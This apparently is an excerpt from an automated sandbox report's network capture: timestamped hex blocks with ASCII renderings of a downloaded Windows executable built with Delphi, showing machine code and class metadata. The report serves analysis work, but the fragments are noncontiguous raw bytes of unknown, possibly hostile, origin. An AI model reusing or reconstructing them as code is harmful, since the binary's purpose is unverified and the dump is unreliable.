                                                                  2021-09-30 21:52:28 UTC352INData Raw: 53 56 57 51 89 0c 24 8b f2 8b 46 08 50 8b 44 24 04 b9 01 00 00 00 8b 15 f0 7e 43 00 e8 0f 11 fb ff 83 c4 04 8b 7e 08 4f 85 ff 7c 21 47 33 db 8b 46 08 3b c3 77 05 e8 bd 83 fd ff 8b 46 04 8b 04 98 8b 14 24 8b 12 89 04 9a 43 4f 75 e2 5a 5f 5e 5b c3 8b c0 53 56 e8 2d d8 fa ff 8b da 8b f0 b2 fc 22 d3 8b c6 e8 9e d1 fa ff 84 db 7e 07 8b c6 e8 bb d7 fa ff 5e 5b c3 55 8b ec 83 c4 f4 53 56 89 55 fc 8b d8 b2 01 a1 00 d6 44 00 e8 0f 02 00 00 89 45 f8 33 d2 55 68 f2 8b 45 00 64 ff 32 64 89 22 8b c3 8b 10 ff 12 89 45 f4 33 c0 55 68 ca 8b 45 00 64 ff 30 64 89 20 eb 13 8b 45 f4 8b 10 ff 12 8b f0 8b d6 8b 45 f8 e8 d6 02 00 00 8b 45 f4 8b 10 ff 52 04 8b d8 84 db 75 df 33 c0 5a 59 59 64 89 10 68 d1 8b 45 00 83 7d f4 00 74 0a b2 01 8b 45 f4 8b 08 ff 51 fc c3 e9 6d e4 fa ff
                                                                  Data Ascii: SVWQ$FPD$~C~O|!G3F;wF$COuZ_^[SV-"~^[USVUDE3UhEd2d"E3UhEd0d EEERu3ZYYdhE}tEQm
                                                                  2021-09-30 21:52:28 UTC368INData Raw: 45 00 00 00 04 53 65 6c 66 02 00 00 9c 10 40 00 01 00 06 49 6e 64 65 78 31 02 00 00 9c 10 40 00 02 00 06 49 6e 64 65 78 32 02 00 02 00 48 00 18 7c 4b 00 04 4d 6f 76 65 03 00 00 00 00 00 08 00 03 08 1c cf 45 00 00 00 04 53 65 6c 66 02 00 00 9c 10 40 00 01 00 08 43 75 72 49 6e 64 65 78 02 00 00 9c 10 40 00 02 00 08 4e 65 77 49 6e 64 65 78 02 00 02 00 30 00 18 7c 4b 00 05 46 69 72 73 74 03 00 ac 96 43 00 08 00 02 08 1c cf 45 00 00 00 04 53 65 6c 66 02 00 50 ac 96 43 00 01 00 01 01 02 00 02 00 2f 00 18 7c 4b 00 04 4c 61 73 74 03 00 ac 96 43 00 08 00 02 08 1c cf 45 00 00 00 04 53 65 6c 66 02 00 50 ac 96 43 00 01 00 01 01 02 00 02 00 25 00 18 7c 4b 00 05 43 6c 65 61 72 03 00 00 00 00 00 08 00 01 08 1c cf 45 00 00 00 04 53 65 6c 66 02 00 02 00 26 00 18 7c 4b 00
                                                                  Data Ascii: ESelf@Index1@Index2H|KMoveESelf@CurIndex@NewIndex0|KFirstCESelfPC/|KLastCESelfPC%|KClearESelf&|K
                                                                  2021-09-30 21:52:28 UTC384INData Raw: 6c 66 02 00 0a 94 0b 44 00 02 00 0a 43 6f 6c 6c 65 63 74 69 6f 6e 02 00 02 00 27 00 98 ab 45 00 07 44 65 73 74 72 6f 79 03 00 00 00 00 00 08 00 01 08 50 14 46 00 00 00 04 53 65 6c 66 02 00 02 00 40 00 d8 ab 45 00 05 45 72 72 6f 72 03 00 00 00 00 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 03 4d 73 67 02 00 00 54 11 40 00 02 00 04 44 61 74 61 02 00 02 00 40 00 18 7c 4b 00 05 45 72 72 6f 72 03 00 00 00 00 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 1c 33 40 00 01 00 03 4d 73 67 02 00 00 54 11 40 00 02 00 04 44 61 74 61 02 00 02 00 32 00 10 ac 45 00 03 41 64 64 03 00 9c 10 40 00 08 00 02 08 50 14 46 00 00 00 04 53 65 6c 66 02 00 02 b8 5e 46 00 01 00 05 56 61 6c 75 65 02 00 02 00 38 00 18 7c 4b 00 08 41 64 64 52 61
                                                                  Data Ascii: lfDCollection'EDestroyPFSelf@EErrorSelf@MsgT@Data@|KErrorSelf3@MsgT@Data2EAdd@PFSelf^FValue8|KAddRa
                                                                  2021-09-30 21:52:28 UTC400INData Raw: b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 e0 c5 40 00 ec c5 40 00 34 60 40 00 28 60 40 00 00 c6 40 00 a4 5c 40 00 d8 5c 40 00 b4 57 40 00 00 00 03 00 38 4b 46 00 43 00 f4 ff 6a 4b 46 00 43 00 f4 ff b2 4b 46 00 ca 00 00 00 01 00 19 54 43 6f 6d 70 61 72 65 72 3c 53 79 73 74 65 6d 2e 50 6f 69 6e 74 65 72 3e 32 00 d8 b6 45 00 07 44 65 66 61 75 6c 74 03 00 d0 d0 45 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 48 d0 d0 45 00 01 00 01 01 02 00 02 00 48 00 18 7c 4b 00 09 43 6f 6e 73 74 72 75 63 74 03 00 d0 d0 45 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 0a ec 49 46 00 01 00 0a 43 6f 6d 70 61 72 69 73 6f 6e 02 00 48 d0 d0 45 00 02 00 01 01 02 00 02 00 44 00 18 7c 4b 00 07 43 6f 6d 70 61 72 65 03 00 9c 10 40 00 08 00 03 08 f8 4b 46 00 00
                                                                  Data Ascii: ]@]@`@`@@@4`@(`@@\@\@W@8KFCjKFCKFTComparer<System.Pointer>2EDefaultESelfHEH|KConstructESelfIFComparisonHED|KCompare@KF
                                                                  2021-09-30 21:52:28 UTC416INData Raw: 00 00 00 00 00 04 53 65 6c 66 02 00 08 88 1f 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 00 64 6c 46 00 02 00 08 50 72 6f 70 49 6e 66 6f 02 00 02 60 29 40 00 08 00 05 56 61 6c 75 65 02 00 02 00 00 00 00 18 8b 46 00 07 1e 54 50 72 6f 70 53 65 74 3c 53 79 73 74 65 6d 2e 52 61 77 42 79 74 65 53 74 72 69 6e 67 3e 2c 8a 46 00 88 1f 40 00 00 00 0e 53 79 73 74 65 6d 2e 54 79 70 49 6e 66 6f 00 00 00 00 02 00 00 00 00 00 00 b4 8b 46 00 00 00 00 00 00 00 00 00 00 00 00 00 98 8c 46 00 00 00 00 00 b4 8b 46 00 00 00 00 00 ca 8b 46 00 08 00 00 00 10 17 40 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 d8 5c 40 00 00 00 02 00 e2 8b 46 00 43 00 f4 ff 38 8c 46 00 43 00 f4 ff 00 00 17 54 50 72 6f
                                                                  Data Ascii: Self@InstancedlFPropInfo`)@ValueFTPropSet<System.RawByteString>,F@System.TypInfoFFFF@]@]@`@`@,`@0`@4`@(`@\@\@\@FC8FCTPro
                                                                  2021-09-30 21:52:28 UTC432INData Raw: 66 02 00 02 00 48 00 18 7c 4b 00 04 4d 6f 76 65 03 00 00 00 00 00 08 00 03 08 f8 cc 46 00 00 00 04 53 65 6c 66 02 00 00 9c 10 40 00 01 00 08 43 75 72 49 6e 64 65 78 02 00 00 9c 10 40 00 02 00 08 4e 65 77 49 6e 64 65 78 02 00 02 00 34 00 18 7c 4b 00 06 52 65 6d 6f 76 65 03 00 9c 10 40 00 08 00 02 08 f8 cc 46 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 04 49 74 65 6d 02 00 02 00 4b 00 18 7c 4b 00 0a 52 65 6d 6f 76 65 49 74 65 6d 03 00 9c 10 40 00 08 00 03 08 f8 cc 46 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 04 49 74 65 6d 02 00 00 b0 d8 40 00 02 00 09 44 69 72 65 63 74 69 6f 6e 02 00 02 00 24 00 18 7c 4b 00 04 50 61 63 6b 03 00 00 00 00 00 08 00 01 08 f8 cc 46 00 00 00 04 53 65 6c 66 02 00 02 00 35 00 18 7c 4b 00 04 53 6f 72 74 03 00 00 00
                                                                  Data Ascii: fH|KMoveFSelf@CurIndex@NewIndex4|KRemove@FSelf@ItemK|KRemoveItem@FSelf@Item@Direction$|KPackFSelf5|KSort
                                                                  2021-09-30 21:52:28 UTC448INData Raw: 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 04 db 48 00 88 d4 48 00 70 db 48 00 84 db 48 00 c8 d9 48 00 44 dc 48 00 14 da 48 00 d0 dc 48 00 28 d7 48 00 08 d8 48 00 b4 d5 48 00 a8 da 48 00 ec da 48 00 48 db 48 00 c4 db 48 00 00 00 00 00 00 00 01 00 00 54 11 40 00 10 00 00 00 09 46 43 61 70 61 63 69 74 79 02 00 00 00 08 00 8d 0b 47 00 4d 00 ff ff b4 0b 47 00 42 00 f4 ff d9 0b 47 00 42 00 f4 ff 17 0c 47 00 42 00 f4 ff 55 0c 47 00 4a 00 02 00 8d 0c 47 00 4a 00 01 00 c5 0c 47 00 4a 00 04 00 09 0d 47 00 4a 00 06 00 0e 00 0d 54 4d 65 6d 6f 72 79 53 74 72 65 61 6d 27 00 04 db 48 00 07 44 65 73 74 72 6f 79 03 00 00 00 00 00 08 00 01 08 60 0d 47 00 00 00 04 53 65 6c 66 02 00 02 00 25 00 30 db 48 00 05 43 6c 65 61 72 03 00 00 00 00 00 08 00 01 08 60 0d 47 00 00
                                                                  Data Ascii: 4`@(`@\@\@HHpHHHDHHH(HHHHHHHHT@FCapacityGMGBGBGBUGJGJGJGJTMemoryStream'HDestroy`GSelf%0HClear`G
                                                                  2021-09-30 21:52:28 UTC464INData Raw: 67 03 00 00 00 00 00 08 00 02 00 b8 12 40 00 00 00 0b 41 54 68 72 65 61 64 4e 61 6d 65 02 00 00 e4 10 40 00 01 00 09 41 54 68 72 65 61 64 49 44 02 00 02 00 2e 00 18 7c 4b 00 08 53 70 69 6e 57 61 69 74 03 00 00 00 00 00 08 00 01 00 9c 10 40 00 00 00 0a 49 74 65 72 61 74 69 6f 6e 73 02 00 02 00 28 00 18 7c 4b 00 05 53 6c 65 65 70 03 00 00 00 00 00 08 00 01 00 9c 10 40 00 00 00 07 54 69 6d 65 6f 75 74 02 00 02 00 17 00 4c 79 49 00 05 59 69 65 6c 64 03 00 00 00 00 00 08 00 00 02 00 35 00 18 7c 4b 00 0e 47 65 74 53 79 73 74 65 6d 54 69 6d 65 73 03 00 00 10 40 00 08 00 01 30 ec 41 47 00 00 00 0b 53 79 73 74 65 6d 54 69 6d 65 73 02 00 02 00 36 00 18 7c 4b 00 0b 47 65 74 43 50 55 55 73 61 67 65 03 00 9c 10 40 00 08 00 01 11 ec 41 47 00 00 00 0f 50 72 65 76 53 79
                                                                  Data Ascii: g@AThreadName@AThreadID.|KSpinWait@Iterations(|KSleep@TimeoutLyIYield5|KGetSystemTimes@0AGSystemTimes6|KGetCPUUsage@AGPrevSy
                                                                  2021-09-30 21:52:28 UTC480INData Raw: 00 00 00 00 00 00 00 1b 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 01 00 ff ff 02 00 00 00 00 54 8b 47 00 00 00 00 00 00 00 00 00 00 00 00 00 30 8c 47 00 5c 8b 47 00 87 8b 47 00 00 00 00 00 9d 8b 47 00 10 00 00 00 c8 85 47 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 d8 5c 40 00 88 ac 49 00 98 ac 49 00 00 00 00 00 00 00 02 00 00 08 99 47 00 04 00 00 00 05 46 4c 69 73 74 02 00 00 9c 10 40 00 08 00 00 00 06 46 49 6e 64 65 78 02 00 00 00 02 00 cf 8b 47 00 44 00 f4 ff 04 8c 47 00 42 00 f4 ff 02 00 31 54 4c 69 73 74 3c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 54 43 6f 6c 6c 65 63 74 69 6f 6e 49 74 65 6d 3e 2e 54 45 6e 75 6d 65 72 61 74 6f 72
                                                                  Data Ascii: System.Generics.CollectionsTG0G\GGGG]@]@`@`@,`@0`@4`@(`@\@\@\@IIGFList@FIndexGDGB1TList<System.Classes.TCollectionItem>.TEnumerator
                                                                  2021-09-30 21:52:28 UTC496INData Raw: 65 4e 65 78 74 03 00 00 10 40 00 08 00 01 08 f0 ca 47 00 00 00 04 53 65 6c 66 02 00 02 00 00 00 f4 ca 47 00 07 1b 54 45 6e 75 6d 65 72 61 74 6f 72 3c 53 79 73 74 65 6d 2e 49 6e 74 65 67 65 72 3e 94 ca 47 00 88 1f 40 00 00 00 1b 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 00 00 01 00 02 46 cb 47 00 02 00 02 00 00 00 9c 10 40 00 00 00 00 fe 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 07 43 75 72 72 65 6e 74 c0 cb 47 00 00 00 00 00 00 00 00 00 00 00 00 00 8c cc 47 00 00 00 00 00 c8 cb 47 00 00 00 00 00 e6 cb 47 00 08 00 00 00 10 17 40 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 40 bf 49 00 b4 57 40 00 64 bf 49 00 00 00 03 00 02 cc 47
                                                                  Data Ascii: eNext@GSelfGTEnumerator<System.Integer>G@System.Generics.CollectionsFG@CurrentGGGG@]@]@`@`@,`@0`@4`@(`@\@\@@IW@dIG
                                                                  2021-09-30 21:52:28 UTC512INData Raw: 48 00 02 00 0b 41 44 69 63 74 69 6f 6e 61 72 79 02 00 02 00 2d 00 24 d1 49 00 0d 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 03 00 10 09 48 00 08 00 01 08 44 0b 48 00 00 00 04 53 65 6c 66 02 00 02 00 32 00 34 d1 49 00 07 54 6f 41 72 72 61 79 03 00 2c d8 40 00 08 00 02 08 44 0b 48 00 00 00 04 53 65 6c 66 02 00 40 2c d8 40 00 01 00 01 01 02 00 02 00 00 48 0b 48 00 07 49 54 44 69 63 74 69 6f 6e 61 72 79 3c 53 79 73 74 65 6d 2e 73 74 72 69 6e 67 2c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 54 50 65 72 73 69 73 74 65 6e 74 43 6c 61 73 73 3e 2e 54 4b 65 79 43 6f 6c 6c 65 63 74 69 6f 6e 10 0a 48 00 50 12 44 00 00 00 1b 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 00 00 01 00 02 c8 0b 48 00 02 00 02 00 00 00 9c 10 40 00 d8 d0 49
                                                                  Data Ascii: HADictionary-$IGetEnumeratorHDHSelf24IToArray,@DHSelf@,@HHITDictionary<System.string,System.Classes.TPersistentClass>.TKeyCollectionHPDSystem.Generics.CollectionsH@I
                                                                  2021-09-30 21:52:28 UTC528INData Raw: 1d f8 ff c3 e9 63 25 f8 ff eb ee 8b 45 f4 5f 5e 5b 8b e5 5d c3 8d 40 00 8b 40 bc 09 c0 74 03 8b 40 02 c3 90 55 8b ec 83 c4 f4 53 33 d2 89 55 f4 8b d8 33 c0 55 68 54 4b 48 00 64 ff 30 64 89 20 89 5d f8 c6 45 fc 11 8d 45 f8 50 6a 00 8d 55 f4 a1 14 a7 4b 00 e8 c6 7e f8 ff 8b 4d f4 b2 01 a1 24 c1 46 00 e8 67 a7 f9 ff e8 de 25 f8 ff 33 c0 5a 59 59 64 89 10 68 5b 4b 48 00 8d 45 f4 e8 cd 2e f8 ff c3 e9 e3 24 f8 ff eb f0 5b 8b e5 5d c3 55 8b ec 51 53 8b d8 83 ca ff a1 18 1c 4c 00 e8 6c 1a f8 ff 33 c0 55 68 a9 4b 48 00 64 ff 30 64 89 20 8b d3 a1 18 1c 4c 00 e8 c2 fd ff ff 89 45 fc 33 c0 5a 59 59 64 89 10 68 b0 4b 48 00 a1 18 1c 4c 00 e8 c0 1c f8 ff c3 e9 8e 24 f8 ff eb ee 8b 45 fc 5b 59 5d c3 90 55 8b ec 53 8b d8 83 ca ff a1 18 1c 4c 00 e8 15 1a f8 ff 33 c0 55 68
                                                                  Data Ascii: c%E_^[]@@t@US3U3UhTKHd0d ]EEPjUK~M$Fg%3ZYYdh[KHE.$[]UQSLl3UhKHd0d LE3ZYYdhKHL$E[Y]USL3Uh
                                                                  2021-09-30 21:52:28 UTC544INData Raw: 02 00 00 50 0c 43 00 06 41 63 74 69 6f 6e 02 00 e4 8a 48 00 08 3b 54 43 6f 6c 6c 65 63 74 69 6f 6e 4e 6f 74 69 66 79 45 76 65 6e 74 3c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 54 46 69 65 6c 64 73 43 61 63 68 65 2e 54 46 69 65 6c 64 73 3e 00 03 08 06 53 65 6e 64 65 72 07 54 4f 62 6a 65 63 74 0a 04 49 74 65 6d 14 54 46 69 65 6c 64 73 43 61 63 68 65 2e 54 46 69 65 6c 64 73 00 06 41 63 74 69 6f 6e 17 54 43 6f 6c 6c 65 63 74 69 6f 6e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 00 88 1f 40 00 28 67 48 00 50 0c 43 00 81 8b 48 00 02 00 00 00 00 00 00 00 03 08 88 1f 40 00 06 53 65 6e 64 65 72 02 00 0a 28 67 48 00 04 49 74 65 6d 02 00 00 50 0c 43 00 06 41 63 74 69 6f 6e 02 00 b4 8b 48 00 11 15 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 54 43 6c 61 73 73 3e 04 00 00 00
                                                                  Data Ascii: PCActionH;TCollectionNotifyEvent<System.Classes.TFieldsCache.TFields>SenderTObjectItemTFieldsCache.TFieldsActionTCollectionNotification@(gHPCH@Sender(gHItemPCActionHTArray<System.TClass>
                                                                  2021-09-30 21:52:28 UTC560INData Raw: ff e8 fa 94 f7 ff 85 c0 74 33 8b c3 66 be ff ff e8 eb 94 f7 ff 8d 55 fc 66 be fe ff e8 df 94 f7 ff 83 7d fc 00 74 16 ff 75 fc 68 3c cb 48 00 ff 37 8b c7 ba 03 00 00 00 e8 b7 bc f7 ff 33 c0 5a 59 59 64 89 10 68 2a cb 48 00 8d 45 fc e8 fe ae f7 ff c3 e9 14 a5 f7 ff eb f0 5f 5e 5b 59 5d c3 b0 04 02 00 ff ff ff ff 01 00 00 00 2e 00 00 00 33 c0 c3 90 55 8b ec 53 56 57 8b fa 8b d8 85 ff 74 04 33 c0 89 07 8b c7 e8 1f e9 f7 ff 85 db 74 64 8b c3 66 be ff ff e8 64 94 f7 ff 8b f0 85 f6 75 2c 8b c3 8b 15 08 5b 47 00 e8 b1 93 f7 ff 84 c0 74 42 f6 43 1c 10 74 3c 8b c7 e8 ec e8 f7 ff 50 68 cc cb 48 00 53 8b 03 ff 50 38 eb 27 8b c3 8b 15 08 5b 47 00 e8 85 93 f7 ff 84 c0 74 06 f6 43 1c 10 74 10 8b c7 e8 c0 e8 f7 ff 8b d0 8b c6 e8 7f ff ff ff 5f 5e 5b 5d c3 00 00 07 e8 71
                                                                  Data Ascii: t3fUf}tuh<H73ZYYdh*HE_^[Y].3USVWt3tdfdu,[GtBCt<PhHSP8'[GtCt_^[]q
                                                                  2021-09-30 21:52:28 UTC576INData Raw: f6 45 ef 01 75 07 55 e8 ec fd ff ff 59 83 7d f8 00 75 12 33 c0 5a 59 59 64 89 10 e8 20 67 f7 ff e9 2f 01 00 00 8b 45 f8 f6 40 1d 02 74 09 8b 45 f0 8b 55 f8 89 50 1c 8b 45 f8 66 83 48 1c 02 55 b2 01 0f b7 05 68 0c 49 00 e8 a2 fb ff ff 59 8b 55 f0 8b 45 f8 8b 08 ff 51 18 8b 45 f8 66 83 60 1c fd 55 33 d2 0f b7 05 68 0c 49 00 e8 7f fb ff ff 59 f6 45 ef 02 74 15 8b 45 f0 8b 40 2c 8b 4d e0 8b 55 f8 66 be f8 ff e8 73 54 f7 ff f6 45 ef 01 75 09 8b 45 f8 f6 40 1d 02 74 44 8b 45 f0 8b 40 34 8b 55 f8 89 55 d4 83 c0 04 89 45 d0 8d 55 d4 8b 45 d0 e8 eb 05 fa ff 85 c0 7d 44 55 8b 45 f8 e8 5a fa ff ff 59 8b 45 f0 8b 40 34 8b 55 f8 89 55 cc 8d 55 cc 83 c0 04 e8 2e 08 fa ff eb 21 55 8b 45 f8 e8 37 fa ff ff 59 8b 45 f0 8b 40 34 8b 55 f8 89 55 c8 8d 55 c8 83 c0 04 e8 0b 08
                                                                  Data Ascii: EuUY}u3ZYYd g/E@tEUPEfHUhIYUEQEf`U3hIYEtE@,MUfsTEuE@tDE@4UUEUE}DUEZYE@4UUU.!UE7YE@4UUU
                                                                  2021-09-30 21:52:28 UTC592INData Raw: 8b 48 1c 8b 45 f4 e8 ed 72 ff ff 84 c0 75 0d 8b 45 08 50 8b 45 f4 e8 49 fa ff ff 59 33 c0 5a 59 59 64 89 10 68 16 4b 49 00 8d 45 e8 e8 1f 2f f7 ff 8d 45 f8 ba 02 00 00 00 e8 72 2f f7 ff c3 e9 28 25 f7 ff eb e3 8b e5 5d c3 00 00 b0 04 02 00 ff ff ff ff 01 00 00 00 2e 00 00 00 55 8b ec 6a 00 6a 00 6a 00 53 33 c0 55 68 e9 4b 49 00 64 ff 30 64 89 20 8d 4d fc 8b 45 08 8b 50 f8 8b 45 08 8b 40 f0 e8 f8 4a fd ff 83 7d fc 00 75 19 8b 45 08 50 e8 69 f8 ff ff 59 8b 45 08 8b 40 fc b2 0d e8 3f 09 00 00 eb 4c 8d 45 f8 e8 fd 68 f7 ff 8b c8 ba f8 4b 49 00 8b 45 fc e8 7e c5 f8 ff 84 c0 74 31 8b 45 f8 8b 10 ff 52 0c 8b d8 8b 45 08 50 8d 55 f4 8b c3 e8 1a fc ff ff 59 8b 45 08 50 e8 1c f8 ff ff 59 8b 45 08 8b 40 fc 8b 55 f4 e8 41 e8 ff ff 33 c0 5a 59 59 64 89 10 68 f0 4b 49
                                                                  Data Ascii: HEruEPEIY3ZYYdhKIE/Er/(%].UjjjS3UhKId0d MEPE@J}uEPiYE@?LEhKIE~t1EREPUYEPYE@UA3ZYYdhKI
                                                                  2021-09-30 21:52:28 UTC608INData Raw: 8b 50 10 85 d2 74 04 8b 42 08 c3 33 c0 c3 8b c0 53 56 57 55 83 c4 f4 8b f2 8b d8 8b 43 04 85 c0 74 5d 8b 40 10 8b fb 89 3c 24 83 c0 04 89 44 24 04 8b d4 8b 44 24 04 e8 68 86 f9 ff 85 c0 7c 3f 8b 53 04 8b 6a 10 8b 55 08 85 f6 7d 02 33 f6 3b d6 7f 03 8b f2 4e 3b c6 74 25 8b d5 83 c2 04 b1 05 92 e8 6d 92 f9 ff 8b 43 04 8b 40 10 89 7c 24 08 8d 4c 24 08 83 c0 04 8b d6 e8 a9 93 f9 ff 83 c4 0c 5d 5f 5e 5b c3 00 5c 8b 49 00 0f 1e 54 43 6f 6d 70 6f 6e 65 6e 74 2e 47 65 74 4f 62 73 65 72 76 65 72 73 24 30 24 49 6e 74 66 b0 26 40 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 01 00 ff ff 02 00 00 00 ac 8b 49 00 0f 1e 54 43 6f 6d 70 6f 6e 65 6e 74 2e 47 65 74 4f 62 73 65 72 76 65 72 73 24 31 24 49 6e 74 66 b0 26 40
                                                                  Data Ascii: PtB3SVWUCt]@<$D$D$h|?SjU}3;N;t%mC@|$L$]_^[\ITComponent.GetObservers$0$Intf&@@System.ClassesITComponent.GetObservers$1$Intf&@
                                                                  2021-09-30 21:52:28 UTC624INData Raw: a5 f6 ff eb ea 5b 8b e5 5d c3 8b c0 53 56 8b da 8b f0 3b 5e 08 7d 05 e8 dc 43 f9 ff 85 db 75 0c 33 d2 8b c6 e8 1f 00 00 00 5e 5b c3 b8 04 00 00 00 3b d8 7e 06 03 c0 3b d8 7f fa 8b d0 8b c6 e8 04 00 00 00 5e 5b c3 90 55 8b ec 6a 00 6a 00 6a 00 53 56 57 8b fa 89 45 f4 33 c0 55 68 2e cc 49 00 64 ff 30 64 89 20 8b 45 f4 8b 40 04 85 c0 74 05 83 e8 04 8b 00 3b c7 0f 84 bf 00 00 00 85 ff 7d 05 e8 01 27 f8 ff 8d 45 fc 8b 55 f4 8b 52 04 8b 0d 74 06 48 00 e8 fd d1 f6 ff 57 8d 45 f8 b9 01 00 00 00 8b 15 74 06 48 00 e8 81 d0 f6 ff 83 c4 04 8b 45 f8 85 c0 74 05 83 e8 04 8b 00 8b f0 4e 85 f6 7c 14 46 33 db 8d 04 5b 8b 55 f8 c7 04 82 ff ff ff ff 43 4e 75 ef 8b 45 f4 83 c0 04 8b 55 f8 8b 0d 74 06 48 00 e8 ab d1 f6 ff 8b c7 d1 e8 c1 ef 02 03 c7 8b 55 f4 89 42 10 8b 45 fc
                                                                  Data Ascii: []SV;^}Cu3^[;~;^[UjjjSVWE3Uh.Id0d E@t;}'EURtHWEtHEtN|F3[UCNuEUtHUBE
                                                                  2021-09-30 21:52:28 UTC640INData Raw: ff 8b d6 8d 43 04 e8 ed 16 f9 ff 5e 5b c3 8b c0 83 c0 04 e8 f4 16 f9 ff c3 8d 40 00 53 8b 12 8b 18 ff 53 08 5b c3 8b c0 83 c4 f8 66 83 78 22 00 0f 95 c2 84 d2 75 17 89 44 24 04 8b 10 8b 52 08 89 14 24 ba 14 0c 4a 00 3b 14 24 0f 95 c2 84 d2 74 0b ba ec 0a 4a 00 89 50 14 59 5a c3 33 d2 89 50 14 59 5a c3 8d 40 00 55 8b ec 8b 55 08 89 50 20 8b 55 0c 89 50 24 e8 ac ff ff ff 5d c2 08 00 53 8b 40 1c 8b 12 8b 09 8b 18 ff 53 0c 5b c3 90 55 8b ec 6a 00 53 56 8b f2 8b d8 33 c0 55 68 ca 0b 4a 00 64 ff 30 64 89 20 8d 43 1c 8b d6 e8 11 a9 f6 ff 83 7b 1c 00 75 18 8d 55 fc a1 b4 d3 4a 00 e8 9a e1 00 00 8b 55 fc 8d 43 1c e8 f3 a8 f6 ff 85 f6 74 0a b8 50 0b 4a 00 89 43 18 eb 05 33 c0 89 43 18 33 c0 5a 59 59 64 89 10 68 d1 0b 4a 00 8d 45 fc e8 b3 a8 f6 ff c3 e9 6d 64 f6 ff
                                                                  Data Ascii: C^[@SS[fx"uD$R$J;$tJPYZ3PYZ@UUP UP$]S@S[UjSV3UhJd0d C{uUJUCtPJC3C3ZYYdhJEmd
                                                                  2021-09-30 21:52:28 UTC656INData Raw: 00 00 00 00 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 03 4d 73 67 02 00 00 54 11 40 00 02 00 04 44 61 74 61 02 00 02 00 40 00 18 7c 4b 00 05 45 72 72 6f 72 03 00 00 00 00 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 1c 33 40 00 01 00 03 4d 73 67 02 00 00 54 11 40 00 02 00 04 44 61 74 61 02 00 02 00 32 00 28 14 4a 00 03 41 64 64 03 00 9c 10 40 00 08 00 02 08 00 54 4a 00 00 00 04 53 65 6c 66 02 00 02 9c 10 40 00 01 00 05 56 61 6c 75 65 02 00 02 00 38 00 18 7c 4b 00 08 41 64 64 52 61 6e 67 65 03 00 00 00 00 00 08 00 02 08 00 54 4a 00 00 00 04 53 65 6c 66 02 00 16 9c 10 40 00 01 00 06 56 61 6c 75 65 73 02 00 02 00 3c 00 18 7c 4b 00 08 41 64 64 52 61 6e 67 65 03 00 00 00 00 00 08 00 02 08 00 54 4a 00 00 00 04 53 65
                                                                  Data Ascii: Self@MsgT@Data@|KErrorSelf3@MsgT@Data2(JAdd@TJSelf@Value8|KAddRangeTJSelf@Values<|KAddRangeTJSe
                                                                  2021-09-30 21:52:28 UTC672INData Raw: 4a 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 07 43 75 72 72 65 6e 74 44 8b 4a 00 00 00 00 00 00 00 00 00 54 8b 4a 00 a0 97 4a 00 66 8b 4a 00 af 8b 4a 00 00 00 00 00 15 8d 4a 00 2c 00 00 00 ec 6b 48 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 cc 1d 4a 00 10 1d 4a 00 58 1e 4a 00 20 1d 4a 00 0c 1e 4a 00 0e 00 00 00 00 00 01 00 00 00 58 86 4a 00 1c 00 00 00 00 00 00 00 00 00 03 00 00 90 0d 43 00 04 00 00 00 0b 46 4c 69 73 74 48 65 6c 70 65 72 02 00 00 58 86 4a 00 1c 00 00 00 09 46 43 6f 6d 70 61 72 65 72 02 00 00 e0 86 4a 00 20 00 00 00 09 46 4f 6e 4e 6f 74 69 66 79 02 00 00 00 2c 00 5d 8d 4a 00 44 00 f4 ff 83 8d 4a 00 44 00 f4 ff bc 8d 4a 00 44 00 f4 ff f6 8d 4a 00
                                                                  Data Ascii: JCurrentDJTJJfJJJ,kH]@]@`@`@,`@0`@4`@(`@\@\@JJXJ JJXJCFListHelperXJFComparerJ FOnNotify,]JDJDJDJ
